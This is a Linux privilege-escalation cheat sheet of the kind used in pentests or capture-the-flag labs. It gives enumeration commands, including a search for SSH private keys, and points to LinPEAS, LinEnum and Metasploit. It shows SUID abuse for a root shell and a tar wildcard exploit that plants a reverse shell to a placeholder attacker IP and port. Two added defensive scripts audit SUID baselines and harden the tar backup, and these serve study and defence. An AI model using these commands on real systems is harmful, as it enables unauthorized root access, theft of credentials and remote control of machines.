Privesc Checklist


sudo -l
List the commands this user may run through sudo (and whether a password is required).

history
Show shell history.

env
Show environment variables.

find / -perm -u=s -type f 2> /dev/null
Search for commands with SUID enabled (then check https://gtfobins.github.io/)

getcap -r / 2>/dev/null
Search for commands with capabilities (then check https://gtfobins.github.io/)

find / -writable 2>/dev/null
Search for writable files and directories.

find / -name id_rsa 2>/dev/null
Search for SSH private keys.

cat /etc/crontab
Look for scheduled scripts (cron jobs) that run as root.
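Defender-side counterpart to the SUID, writable-file and cron checks above. This is an added example, not part of the original checklist: it diffs the SUID binaries found under a root against a constructed baseline and lists world-writable files, which is the inventory a hardening pass or a detection rule needs. The baseline paths are hypothetical.

```shell
#!/bin/sh
# Added audit example (not from the original checklist): compare the SUID binaries
# present on a host against an expected baseline and list world-writable files.
# Assumes POSIX sh and a find(1) that understands -perm -4000 / -perm -0002
# (GNU and BSD find both do).

# Constructed baseline: SUID binaries expected on this (hypothetical) host, one per line.
SUID_BASELINE="/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su"

# find_suid ROOT: print every regular file under ROOT with the setuid bit (mode 4000).
find_suid() {
    find "$1" -type f -perm -4000 2>/dev/null
}

# find_world_writable ROOT: print regular files under ROOT that any user may modify.
# A world-writable script referenced from root's crontab is the classic privesc path.
find_world_writable() {
    find "$1" -type f -perm -0002 2>/dev/null
}

# audit_suid ROOT BASELINE: print each SUID file under ROOT that is absent from BASELINE
# (a newline-separated list of full paths). Every hit deserves a look on GTFOBins.
audit_suid() {
    find_suid "$1" | while IFS= read -r path; do
        printf '%s\n' "$2" | grep -qxF -- "$path" || echo "UNEXPECTED SUID: $path"
    done
}

# suid_baseline_ok ROOT BASELINE: exit 0 when no unexpected SUID file exists, 1 otherwise.
suid_baseline_ok() {
    [ -z "$(audit_suid "$1" "$2")" ]
}

# Stand-alone run against the live system (read-only; set AUDIT_RUN=1 to enable).
if [ "${AUDIT_RUN:-0}" = 1 ]; then
    audit_suid / "$SUID_BASELINE"
    find_world_writable /etc
fi
```

Generate the baseline once on a freshly built host with find_suid and store it with the build; a later diff then shows exactly what was added by a package, an admin or an intruder.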

Other Suggestions


Automated Scripts


LINPEAS

https://github.com/carlospolop/PEASS-ng/releases

./linpeas.sh


LINENUM

https://github.com/rebootuser/LinEnum

./LinEnum.sh


METASPLOIT

use post/multi/recon/local_exploit_suggester
Check exploits for privilege escalation.

SUID Examples


CP

cp -r /root/ /home/myUser/
cd /home/myUser/root
Read the contents of /root through a SUID cp (the -r is needed to copy a directory).


BASH

bash -p
Get a root shell from a SUID bash (-p keeps the effective UID instead of dropping it).

Wildcard Exploitation


Resource

https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/

Example

Script running as root:

tar cf /home/myUser/backups/backup.tgz *

Exploit:

echo "bash -i >& /dev/tcp/[ATTACKER IP]/[ATTACKER PORT] 0>&1" > revshell.sh
touch "/home/myUser/backups/--checkpoint-action=exec=sh revshell.sh"
touch "/home/myUser/backups/--checkpoint=1"
All three files must sit in the directory where the script's * expands; tar then reads the two file names as options.
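The wildcard problem is fixed on the script side. This added example (not the original page's script or the linked article's code) shows the backup command rewritten so that a file name in the target directory can never be parsed as a tar option, a helper that confirms such a file is stored as plain data, and a check a monitoring rule can run over directories that privileged jobs glob. The paths are hypothetical.

```shell
#!/bin/sh
# Added example (not the original page's script): the root backup job rewritten so that
# a file whose name starts with "-" is archived as data instead of parsed as an option.
# Assumes GNU or BSD tar; directory and archive paths are hypothetical.

# backup_unsafe DIR ARCHIVE: the pattern from the checklist. The shell expands the bare
# "*" into file names before tar runs, so a file named "--checkpoint=1" becomes an option.
backup_unsafe() {
    ( cd "$1" && tar cf "$2" * )
}

# backup_safe DIR ARCHIVE: "./*" makes every expanded name begin with "./", so none can
# start with "-"; the "--" additionally tells tar that only file operands follow.
backup_safe() {
    ( cd "$1" && tar cf "$2" -- ./* )
}

# archive_has_member ARCHIVE NAME: succeed when NAME is stored in ARCHIVE as a member,
# i.e. tar treated it as a path rather than an option.
archive_has_member() {
    tar tf "$1" | grep -qxF -- "$2"
}

# suspicious_names DIR: list entries directly under DIR whose names begin with "-".
# Their appearance in a directory that a root job globs is worth an alert.
suspicious_names() {
    find "$1" -mindepth 1 -maxdepth 1 -name '-*'
}
```

When the file names are not under your control at all, the GNU form `find DIR -print0 | tar --null -T - -cf ARCHIVE` avoids shell expansion entirely; the ./* rewrite is the portable minimum.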